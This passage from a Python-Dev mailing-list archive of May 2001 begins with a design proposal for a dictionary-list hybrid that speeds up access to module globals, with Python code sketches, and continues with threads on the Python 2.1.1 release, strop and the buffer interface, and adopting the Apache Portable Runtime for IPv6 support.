    implementation is included here to explain the basic design:

"""A dictionary-list hybrid"""

import types

class DLict:
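    def __init__(self, names):
        # names maps each global name known at compile time to its slot
        assert isinstance(names, types.DictType)
        self.names = names
        size = len(names)
        self.list = [None] * size   # slot values
        self.empty = [1] * size     # 1 = slot unbound, None = slot bound
        self.dict = {}              # names added dynamically at runtime
        self.size = 0               # number of bound slots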

    def __getitem__(self, name):
        i = self.names.get(name)
        if i is None:
            return self.dict[name]
        if self.empty[i] is not None:
            raise KeyError, name
        return self.list[i]

    def __setitem__(self, name, val):
        i = self.names.get(name)
        if i is None:
            self.dict[name] = val
        else:
            if self.empty[i] is not None:
                self.size += 1      # count a slot only when it becomes bound
            self.empty[i] = None
            self.list[i] = val

    def __delitem__(self, name):
        i = self.names.get(name)
        if i is None:
            del self.dict[name]
        else:
            if self.empty[i] is not None:
                raise KeyError, name
            self.empty[i] = 1
            self.list[i] = None
            self.size -= 1

    def keys(self):
        bound = [name for name, i in self.names.items()
                 if self.empty[i] is None]
        return bound + self.dict.keys()

    def values(self):
        bound = [self.list[i] for i in self.names.values()
                 if self.empty[i] is None]
        return bound + self.dict.values()

    def items(self):
        bound = [(name, self.list[i]) for name, i in self.names.items()
                 if self.empty[i] is None]
        return bound + self.dict.items()

    def __len__(self):
        return self.size + len(self.dict)

    def __cmp__(self, dlict):
        c = cmp(self.names, dlict.names)
        if c != 0:
            return c
        c = cmp(self.size, dlict.size)
        if c != 0:
            return c
        for i in range(len(self.names)):
            c = cmp(self.empty[i], dlict.empty[i])
            if c != 0:
                return c
            if self.empty[i] is None:
                c = cmp(self.list[i], dlict.list[i])
                if c != 0:
                    return c
        return cmp(self.dict, dlict.dict)
    
    def clear(self):
        self.dict.clear()
        for i in range(len(self.names)):
            if self.empty[i] is None:
                self.empty[i] = 1
                self.list[i] = None
        self.size = 0

    def update(self, other):
        for name, val in other.items():
            self[name] = val

    def load(self, index):
        """dlict-special method to support indexed access"""
        if self.empty[index] is None:
            return self.list[index]
        else:
            raise KeyError, index # XXX might want reverse mapping

    def store(self, index, val):
        """dlict-special method to support indexed access"""
        if self.empty[index] is not None:
            self.size += 1
        self.empty[index] = None
        self.list[index] = val

    def delete(self, index):
        """dlict-special method to support indexed access"""
        if self.empty[index] is not None:
            raise KeyError, index
        self.empty[index] = 1
        self.list[index] = None
        self.size -= 1


Compiler issues

    The compiler currently collects the names of all global variables
    in a module.  These are names bound at the module level or bound
    in a class or function body that declares them to be global.

    The compiler would assign indices for each global name and add the
    names and indices of the globals to the module's code object.
    Each code object would then be bound irrevocably to the module it
    was defined in.  (Not sure if there are some subtle problems with
    this.)
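Here is a rough sketch of the index-assignment step, written with the modern ast module. assign_global_indices and _GlobalCollector are hypothetical names, not the compiler's symbol-table pass. Indices are handed out in order of first binding. Comprehensions and lambdas are treated as their own scopes, following Python 3 rules.

```python
import ast


class _GlobalCollector(ast.NodeVisitor):
    """Collect module-level bindings plus names declared `global`."""

    def __init__(self):
        self.indices = {}   # name -> slot index, in order of first binding
        self.depth = 0      # 0 while visiting module-level code

    def _add(self, name):
        if name not in self.indices:
            self.indices[name] = len(self.indices)

    def visit_Name(self, node):
        if self.depth == 0 and isinstance(node.ctx, ast.Store):
            self._add(node.id)

    def visit_Global(self, node):
        for name in node.names:     # `global x` in any function or class
            self._add(name)

    def visit_Import(self, node):
        if self.depth == 0:
            for alias in node.names:
                if alias.name != "*":
                    self._add(alias.asname or alias.name.split(".")[0])

    visit_ImportFrom = visit_Import

    def _nested(self, node):
        # Plain bindings inside a nested scope are local to that scope.
        self.depth += 1
        self.generic_visit(node)
        self.depth -= 1

    def _def(self, node):
        if self.depth == 0:
            self._add(node.name)    # `def f` / `class C` binds f / C
        self._nested(node)

    visit_FunctionDef = visit_AsyncFunctionDef = visit_ClassDef = _def
    visit_Lambda = visit_ListComp = visit_SetComp = _nested
    visit_DictComp = visit_GeneratorExp = _nested


def assign_global_indices(source):
    collector = _GlobalCollector()
    collector.visit(ast.parse(source))
    return collector.indices


src = """
import os.path
x = 1
def f():
    global y
    y = 2
    z = 3
class C:
    pass
squares = [i * i for i in range(3)]
"""
print(assign_global_indices(src))
# {'os': 0, 'x': 1, 'f': 2, 'y': 3, 'C': 4, 'squares': 5}
```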

Enhancement: Optimized access to other modules' globals

    If one module imports another and binds a name in the global
    namespace, the compiler currently detects that the particular
    global is bound to a module.  The compiler would also note accesses
    to any attribute of a module and emit special opcodes for accessing
    these names.

    At runtime the implementation can look up the index of the module
    attribute in the module's namespace.  In the current namespace,
    a pointer to the foreign module's dlict can be recorded along with
    the name's offset in the dlict.  This would allow names,
    e.g. types.StringType, to be used with the same efficiency as
    globals. 
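The recorded (foreign dlict, offset) pair can be sketched with a plain list standing in for the foreign module's slot array. SlotModule and ForeignRef are hypothetical names. The sketch ignores names added at runtime and rebinding of the module object itself. The slot array is shared rather than copied, so a later rebinding inside the foreign module is still seen.

```python
class SlotModule:
    """Hypothetical module namespace: fixed slots indexed by name."""

    def __init__(self, names):
        self.index = {name: i for i, name in enumerate(names)}
        self.slots = [None] * len(names)

    def bind(self, name, value):
        self.slots[self.index[name]] = value


class ForeignRef:
    """What an importing module might record for `mod.attr`."""

    def __init__(self, module, name):
        self.slots = module.slots          # shared with the module, not copied
        self.offset = module.index[name]   # the one name lookup, done once

    def load(self):
        return self.slots[self.offset]     # plain indexed access afterwards


types_mod = SlotModule(["StringType", "IntType"])
types_mod.bind("StringType", str)
ref = ForeignRef(types_mod, "StringType")
print(ref.load() is str)       # True
types_mod.bind("StringType", bytes)
print(ref.load() is bytes)     # True: the rebinding is visible through ref
```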

Backwards compatibility

    The dlict will need to maintain metainformation about whether a
    slot is currently used or not.  It will also need to maintain a
    pointer to the builtin namespace.  When a name is not currently
    used in the global namespace, the lookup will have to fail over to
    the builtin namespace.

    In the reverse case, each module may need a special accessor
    function for the builtin namespace that checks to see if a global
    shadowing the builtin has been added dynamically.  This check
    would only occur if there was a dynamic change to the module's
    dlict, i.e. when a name is bound that wasn't discovered at
    compile-time. 

    These mechanisms would have little if any cost for the common case
    where a module's global namespace is not modified in strange
    ways at runtime.  They would add overhead for modules that did
    unusual things with global names, but this is an uncommon practice
    and probably one worth discouraging.

    It may be desirable to disable dynamic additions to the global
    namespace in some future version of Python.  If so, the new
    implementation could provide warnings.
    

Local Variables:
mode: indented-text
indent-tabs-mode: nil
End:


From barry at digicool.com  Thu May 24 04:46:30 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 22:46:30 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
	<LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
	<20010523124114.A4747@glacier.fnational.com>
	<20010523222751.G690@xs4all.nl>
	<15116.8966.324136.897953@anthem.wooz.org>
	<20010523183949.A19251@thyrsus.com>
Message-ID: <15116.30214.900667.624573@anthem.wooz.org>

>>>>> "ESR" == Eric S Raymond <esr at thyrsus.com> writes:

    ESR> Before you could say "plot complication" I was materializing
    ESR> in the Hyraxeum -- damn near nose-to-trunk with the High
    ESR> Pachyderm himself, as it turned out, who was getting wound up
    ESR> to try out his newest human-goad on a mahout they had just
    ESR> captured from the Fortified Cities.

That big self-important elephant wasn't named Puffy the Frog by any
chance, was he?  Did he taste vaguely lemony?  If so, he's got a lot
of nerve calling himself the "High Pachyderm"!  Quite a lofty title
for one who's skin is stretched to just this side of its tensile
breaking point.

Sure, I know ol' Puffy, had a few binges with the old goat myself.
You just don't want to be near him when the stray micro-meteor happens
to pierce his dermis.  Much, MUCH messier than eight crates of cornbob
filled to the brim with radioactive gorilla poop, I can assure you!

now-where'd-i-leave-my-medication?-ly y'rs,
-Barry


From esr at thyrsus.com  Thu May 24 05:04:58 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 23:04:58 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.30214.900667.624573@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 10:46:30PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org>
Message-ID: <20010523230458.A28895@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> That big self-important elephant wasn't named Puffy the Frog by any
> chance, was he?  Did he taste vaguely lemony?  If so, he's got a lot
> of nerve calling himself the "High Pachyderm"!  Quite a lofty title
> for one who's skin is stretched to just this side of its tensile
> breaking point.

Congratulations, Barry.  I googled for "Puffy the Frog" and found a
page that...explained...this.  It was the #1 hit.

Apparently the Universe is an even more random place than I thought. 
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

If I were to select a jack-booted group of fascists who are 
perhaps as large a danger to American society as I could pick today,
I would pick BATF [the Bureau of Alcohol, Tobacco, and Firearms].
        -- U.S. Representative John Dingell, 1980


From barry at digicool.com  Thu May 24 05:14:07 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 23:14:07 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
	<LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
	<20010523124114.A4747@glacier.fnational.com>
	<20010523222751.G690@xs4all.nl>
	<15116.8966.324136.897953@anthem.wooz.org>
	<20010523183949.A19251@thyrsus.com>
	<15116.30214.900667.624573@anthem.wooz.org>
	<20010523230458.A28895@thyrsus.com>
Message-ID: <15116.31871.122265.883855@anthem.wooz.org>

>>>>> "ESR" == Eric S Raymond <esr at thyrsus.com> writes:

    ESR> Congratulations, Barry.  I googled for "Puffy the Frog" and
    ESR> found a page that...explained...this.  It was the #1 hit.

Yes!  In 1965.  My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass
singer in the Atlanta-based band "The Shrinking of George".  What you
found is no doubt the lyrics to that song, which topped the pop charts
briefly in 1965 (August 1st, 1965, 11:57 - 13:01 to be exact),
displacing the Beatles' "I Wanna Hold Your Head" before being itself
displaced by the Bee Gees' "Booger Feever" [sic].  Sadly, even
Napster doesn't have the mp3's and all Dad's old records are scratched
beyond hope.

    ESR> Apparently the Universe is an even more random place than I
    ESR> thought.

here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs,
-Barry


From esr at thyrsus.com  Thu May 24 05:31:42 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 23:31:42 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 11:14:07PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> <15116.31871.122265.883855@anthem.wooz.org>
Message-ID: <20010523233142.A29023@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> Yes!  In 1965.  My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass
> singer in the Atlanta-based band "The Shrinking of George". 

I suppose it's not a coincidence that it's Fernando Poo day today.
Of course it's not a coincidence.  There are no coincidences anywhere.
Fnord.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Sometimes it is said that man cannot be trusted with the government
of himself.  Can he, then, be trusted with the government of others?
	-- Thomas Jefferson, in his 1801 inaugural address


From aahz at rahul.net  Thu May 24 06:59:37 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 23 May 2001 21:59:37 -0700 (PDT)
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEBJKEAA.tim.one@home.com> from "Tim Peters" at May 23, 2001 03:45:06 PM
Message-ID: <20010524045938.5228199C83@waltz.rahul.net>

Tim Peters wrote:
> [Aahz]
>>
>> (This got brought up because I experimented with os._exit() as a
>> possible solution, but that GPFs on Win98SE.)
> 
> Please open a bug report on that, then, with a tiny test case if possible.
> This worked fine on Win98SE for me just now:

Futz.  *Now* it works.  <sigh>  Chalk it up to another unreproducible
bug caused by an unstable Win98.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From gstein at lyra.org  Thu May 24 10:33:49 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 01:33:49 -0700
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.81,2.82
In-Reply-To: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>; from gvanrossum@users.sourceforge.net on Mon, May 14, 2001 at 07:14:46PM -0700
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010524013349.Y5402@lyra.org>

On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote:
> Update of /cvsroot/python/python/dist/src/Modules
> In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules
> 
> Modified Files:
> 	stropmodule.c 
> Log Message:
> Add warnings to the strop module, for to those functions that really
> *are* obsolete; three variables and the maketrans() function are not
> (yet) obsolete.
> 
> Add a compensating warnings.filterwarnings() call to test_strop.py.
> 
> Add this to the NEWS.

Something that I ran into the other day...

>>> ob = some_object_implementing_the_buffer_interface
>>> string.find(ob, '.')
(fails because ob does not define the .find method)
>>> strop.find(ob, '.')
(succeeds)


The point is that strop uses the t# to get a ptr/len pair to do its work.
Thus, it can work on many things that export the buffer interface. Dropping
strop means we no longer have many of those functions. Instead, the
functionality must be copied to *every* object that implements the buffer
interface.

We can say ob.find() now, but we can't say find(ob) any longer. And saying
that all objects (which implement the buffer API) must now implement a bunch
of "standard" methods is awfully burdensome.

In my particular case, I was trying to do a find on a BufferObject referring
to a subset of another object. Blam. No good. Thankfully, when I did a
find() on a mmap object, it worked simply because mmaps happen to define a
.find method.

[ of course, the find method on an mmap was totally broken, but I checked in
  a fix for that (last week or so) ]


So... my question is: is there any way that we can retain a generic find()
(and similar functions from the string/strop module) that operates on any
type that implements the buffer API?
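In today's Python 3, a generic function of this kind can be written against the buffer protocol via memoryview. buffer_find is a hypothetical name. strop worked on the ptr/len pair in place, but this sketch copies the data with tobytes().

```python
def buffer_find(ob, sub, start=0):
    """find() for any object exporting the buffer protocol.

    Works for bytes, bytearray, memoryview slices, mmap objects and
    similar, without requiring the object to define a .find() method.
    """
    with memoryview(ob) as view:      # TypeError if ob exports no buffer
        data = view.tobytes()         # raw bytes, copied
    return data.find(sub, start)      # sub may be any bytes-like object


print(buffer_find(bytearray(b"abc.def"), b"."))      # 3
print(buffer_find(memoryview(b"xx.yy")[1:], b"."))   # 1
```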

Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
implements some standard methods for 8-bit character data (using the buffer
API), which can be mixed into new Python types" That would reduce the burden
for new types.

Thoughts?

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein at lyra.org  Thu May 24 10:52:58 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 01:52:58 -0700
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>; from guido@digicool.com on Thu, May 17, 2001 at 02:18:27PM -0400
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <20010524015258.Z5402@lyra.org>

On Thu, May 17, 2001 at 02:18:27PM -0400, Guido van Rossum wrote:
> What's our IPv6 story?  I recall that someone once sent me patches,
> but they didn't work for me.  Is it time to try again?  In certain
> circles IPv6 support in Python would be enough to switch programming
> languages... :-)

Radical suggestion:

  Toss out a ton of the platform-specific stuff in Python and use the Apache
  Portable Runtime (APR). It has IPv6 in it, but it could also help with
  loading shared libraries, threading, mmap'd files, sockets, etc.

(it won't replace *all* of Python's platform specific stuff; I think Python
 has more coverage than APR does)

Could simplify a number of things for Python, and reduce some of the
maintenance costs...

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From thomas at xs4all.net  Thu May 24 11:01:52 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 24 May 2001 11:01:52 +0200
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <m3u22bjiz6.fsf@atrus.jesus.cam.ac.uk>; from mwh@python.net on Thu, May 24, 2001 at 08:37:17AM +0100
References: <20010523160025.B690@xs4all.nl> <m3u22bjiz6.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <20010524110152.Q676@xs4all.nl>

[ Answer CC'd to python-dev since it deserves an official answer :) ]

On Thu, May 24, 2001 at 08:37:17AM +0100, Michael Hudson wrote:
> For summarising purposes, do you have any idea when Python 2.1.1 will
> be released?

> "No" is a perfectly acceptable answer.

Then "No" it is! Even though I have a fair number of patches in the queue
right now, I need some more time to check out (no pun intended) the changes
since the fork, and I want to browse the bug list for possible bugs that
should be checked out and fixed for 2.1.1. Another couple of weeks at least,
before a release candidate. It also depends on Moshe; if he actually
releases 2.0.1 anytime soon, I'll hold off on 2.1.1 a bit longer.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Thu May 24 12:18:50 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 12:18:50 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org>
Message-ID: <3B0CE00A.488C8D73@lemburg.com>

Greg Stein wrote:
> 
> On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote:
> > Update of /cvsroot/python/python/dist/src/Modules
> > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules
> >
> > Modified Files:
> >       stropmodule.c
> > Log Message:
> > Add warnings to the strop module, for those functions that really
> > *are* obsolete; three variables and the maketrans() function are not
> > (yet) obsolete.
> >
> > Add a compensating warnings.filterwarnings() call to test_strop.py.
> >
> > Add this to the NEWS.
> 
> Something that I ran into the other day...
> 
> >>> ob = some_object_implementing_the_buffer_interface
> >>> string.find(ob, '.')
> (fails because ob does not define the .find method)
> >>> strop.find(ob, '.')
> (succeeds)
> 
> The point is that strop uses the t# to get a ptr/len pair to do its work.
> Thus, it can work on many things that export the buffer interface. Dropping
> strop means we no longer have many of those functions. Instead, the
> functionality must be copied to *every* object that implements the buffer
> interface.
> 
> We can say ob.find() now, but we can't say find(ob) any longer. And saying
> that all objects (which implement the buffer API) must now implement a bunch
> of "standard" methods is awfully burdensome.
> 
> In my particular case, I was trying to do a find on a BufferObject referring
> to a subset of another object. Blam. No good. Thankfully, when I did a
> find() on a mmap object, it worked simply because mmaps happen to define a
> .find method.
> 
> [ of course, the find method on an mmap was totally broken, but I checked in
>   a fix for that (last week or so) ]
> 
> So... my question is: is there any way that we can retain a generic find()
> (and similar functions from the string/strop module) that operates on any
> type that implements the buffer API?
> 
> Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> implements some standard methods for 8-bit character data (using the buffer
> API), which can be mixed into new Python types" That would reduce the burden
> for new types.

I suppose that in 2.2 we'll be able to build a class/type
hierarchy which then provides these possibilities. I haven't
followed Guido's latest checkins closely though -- could be that
types don't support multiple inheritance.

BTW, wouldn't it suffice to add these methods to buffer objects ?
Then you could write: buffer(ob).find('.').

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From barry at digicool.com  Thu May 24 13:50:34 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 24 May 2001 07:50:34 -0400
Subject: [Python-Dev] IPv6
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
	<20010524015258.Z5402@lyra.org>
Message-ID: <15116.62858.720241.46017@anthem.wooz.org>

>>>>> "GS" == Greg Stein <gstein at lyra.org> writes:

    GS>   Toss out a ton of the platform-specific stuff in Python and
    GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
    GS> it could also help with loading shared libraries, threading,
    GS> mmap'd files, sockets, etc.

I don't know squat about APR, but would it have to be either-or?  IOW,
would it be possible to wrap the APR in a module (or package) and
provide it as an importable alternative?

-Barry


From mal at lemburg.com  Thu May 24 14:22:42 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 14:22:42 +0200
Subject: [Python-Dev] IPv6
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
		<20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org>
Message-ID: <3B0CFD12.164271D8@lemburg.com>

"Barry A. Warsaw" wrote:
> 
> >>>>> "GS" == Greg Stein <gstein at lyra.org> writes:
> 
>     GS>   Toss out a ton of the platform-specific stuff in Python and
>     GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
>     GS> it could also help with loading shared libraries, threading,
>     GS> mmap'd files, sockets, etc.
> 
> I don't know squat about APR, but would it have to be either-or?  IOW,
> would it be possible to wrap the APR in a module (or package) and
> provide it as an importable alternative?

Should be possible; the problem is: how do you get the APR types
to interact with the original Python ones (e.g. file types). Many
low-level Python functions require the native Python types, so
while wrapping APR as a Python module would provide an alternative, that
alternative will most probably not help much w/r to simplifying
portability issues.

FYI, here's what the APR has to offer (taken from the APRDesign
file that comes with Apache 2.0 beta):
"""
The base types in APR
file_io     File I/O, including pipes
lib         A portable library originally used in Apache.  This contains
            memory management, tables, and arrays.
locks       Mutex and reader/writer locks
misc        Any APR type which doesn't have any other place to belong
network_io  Network I/O
shmem       Shared Memory (Not currently implemented)   
signal      Asynchronous Signals
threadproc  Threads and Processes
time        Time 
"""

It currently supports: Unix (includes BeOS), Win32 and OS/2.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From gstein at lyra.org  Thu May 24 14:55:55 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 05:55:55 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <3B0CFD12.164271D8@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 02:22:42PM +0200
References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> <3B0CFD12.164271D8@lemburg.com>
Message-ID: <20010524055555.B5402@lyra.org>

On Thu, May 24, 2001 at 02:22:42PM +0200, M.-A. Lemburg wrote:
> "Barry A. Warsaw" wrote:
> > >>>>> "GS" == Greg Stein <gstein at lyra.org> writes:
> > 
> >     GS>   Toss out a ton of the platform-specific stuff in Python and
> >     GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
> >     GS> it could also help with loading shared libraries, threading,
> >     GS> mmap'd files, sockets, etc.
> > 
> > I don't know squat about APR, but would it have to be either-or?  IOW,
> > would it be possible to wrap the APR in a module (or package) and
> > provide it as an importable alternative?

Sure, that is a possibility, but it doesn't save Python much in terms of
maintenance or portability. "Just another library"

Truly using it could certainly be done as a slow migration, and it is
definitely possible to only use portions, subsets, etc. Another alternative
would be to use APR as a "platform target". But that just adds yet another
platform to support rather than simplifying.

> Should be possible; the problem is: how do you get the APR types
> to interact with the original Python ones (e.g. file types). Many

The header is a total misnomer, but "apr_portable.h" provides access to an
opaque type's underlying native object (many of us aren't sure how Ryan
arrived at "portable" being the name for the least-portable aspect of the
library :-). Anyways... you can extract a file descriptor from a file or
socket or pipe. Or a thread ID from a thread object, etc.

> low-level Python functions require the native Python types, so
> while wrapping APR as Python module would provide an alternative, that
> alternative will most probably not help much w/r to simplifying
> portability issues.

Right. I'd say use the APR functions unless absolute speed is required (such
as the readlines stuff). But you could also argue that the hard-core
platform specific optimizations could go into APR itself, so that Python
doesn't have to worry about them.

> FYI, here's what the APR has to offer (taken from the APRDesign
> file that comes with Apache 2.0 beta):
> """
> The base types in APR
> file_io     File I/O, including pipes
> lib         A portable library originally used in Apache.  This contains
>             memory management, tables, and arrays.
> locks       Mutex and reader/writer locks
> misc        Any APR type which doesn't have any other place to belong
> network_io  Network I/O
> shmem       Shared Memory (Not currently implemented)   
> signal      Asynchronous Signals
> threadproc  Threads and Processes
> time        Time 
> """

That doc is out of date; the list is missing: shared library handling, i18n,
mmap, user information access (e.g. getpwnam), uuid handling, getopt
replacements, cryptographic random data, and a few other bits here and
there. Shared memory actually is mostly implemented, via the libmm library.

And note that some of those topics have some nice depth. As I mentioned,
network_io supports IPv6, but also portable name lookups, sendfile(), etc.
The file_io stuff supports optimized stat() and opendir-type calls for the
platform.

> It currently supports: Unix (includes BeOS), Win32 and OS/2.

A lot more than that :-)  Pretty much all the Unix variants, including
OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. 

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein at lyra.org  Thu May 24 15:00:16 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 06:00:16 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 12:18:50PM +0200
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com>
Message-ID: <20010524060016.D5402@lyra.org>

On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote:
> Greg Stein wrote:
>...
> > So... my question is: is there any way that we can retain a generic find()
> > (and similar functions from the string/strop module) that operates on any
> > type that implements the buffer API?
> > 
> > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> > implements some standard methods for 8-bit character data (using the buffer
> > API), which can be mixed into new Python types" That would reduce the burden
> > for new types.
> 
> I suppose that in 2.2 we'll be able to build a class/type
> hierarchy which then provides these possibilities. I haven't
> followed Guido's latest checkins closely though -- could be that
> types don't support multiple inheritance.

No idea either... that's why I asked.

> BTW, wouldn't it suffice to add these methods to buffer objects ?
> Then you could write: buffer(ob).find('.').

You're totally missing the point with that suggestion. It does *not* suffice
to add them to buffer objects. What about array objects? mmap objects?
Random Joe Object who implements the buffer interface?

All of those are out of luck.

With strop, I can pass any of those objects to strop.find(). That function
has a polymorphic argument.

In the current arrangement, every object must implement their own .find and
.upper and .whatever.
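In present-day Python 3 terms, the polymorphic find() described above can be sketched with memoryview, which wraps any object exporting the buffer protocol (the 2001-era buffer() builtin no longer exists). `buffer_find` is a hypothetical helper, not a standard-library function, and tobytes() copies the data for simplicity:

```python
def buffer_find(obj, sub, start=0):
    """Search the raw bytes of any buffer-protocol object for `sub`.

    Accepts bytes, bytearray, array.array, mmap.mmap, or anything else
    memoryview() accepts, so no per-type .find() method is required.
    """
    with memoryview(obj) as view:
        # cast('B') flattens multi-byte item formats (e.g. array('i'))
        # to unsigned bytes; it requires a C-contiguous buffer.
        data = view.cast('B').tobytes()
    return data.find(sub, start)
```

The same function serves every exporter, which is the property the strop-style function had and per-type methods lack.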

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mwh at python.net  Thu May 24 15:02:34 2001
From: mwh at python.net (Michael Hudson)
Date: Thu, 24 May 2001 14:02:34 +0100 (BST)
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <20010524055555.B5402@lyra.org>
Message-ID: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>

I can't think of a good way of expressing this, but I don't think we
should try to make writing non cross-platform code in Python impossible.
Yes, it should be easy to write x-platform code, but if there's some very
specific platform trick I can do with, say, setsockopt, I don't want
Python to hide it from me just 'cause it doesn't work on VMS.

Maybe this isn't an issue here.
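The kind of platform trick meant here can be sketched with Python's socket module, which defines platform-specific constants only where the OS provides them, so code can probe for an option instead of being limited to a lowest common denominator. `enable_keepalive` is a hypothetical helper; TCP_KEEPIDLE is one such option that is not defined on every platform:

```python
import socket

def enable_keepalive(sock, idle_seconds=60):
    """Enable TCP keepalive; also tune the idle time where supported.

    Returns True if the platform-specific TCP_KEEPIDLE option was set.
    """
    # SO_KEEPALIVE is available across BSD-style socket implementations.
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    # TCP_KEEPIDLE exists only on some platforms; probe for it rather
    # than hiding it behind a portable wrapper.
    if hasattr(socket, "TCP_KEEPIDLE"):
        sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, idle_seconds)
        return True
    return False
```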

On Thu, 24 May 2001, Greg Stein wrote:
[...]
> That doc is out of date; the list is missing: shared library handling, i18n,
> mmap, user information access (e.g. getpwnam), uuid handling, getopt
> replacements, cryptographic random data, and a few other bits here and
> there. The shared mem actually is implemented mostly, via the libmm library.

How big is APR?  How stable?  (in terms of interface; I'm assuming it
doesn't crap out through bad programming or it'd be a non-starter)

> And note that some of those topics have some nice depth. As I mentioned,
> network_io supports IPv6, but also portable name lookups, sendfile(), etc.
> The file_io stuff support optimized stat() and opendir-type calls for the
> platform.
>
> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
>
> A lot more than that :-)  Pretty much all the Unix variants, including
> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.

That's still less than Python isn't it?  RiscOS, Amiga, PalmOS, VMS,
Playstation 2(!), from looking at
http://www.python.org/download/download_other.html.

Cheers,
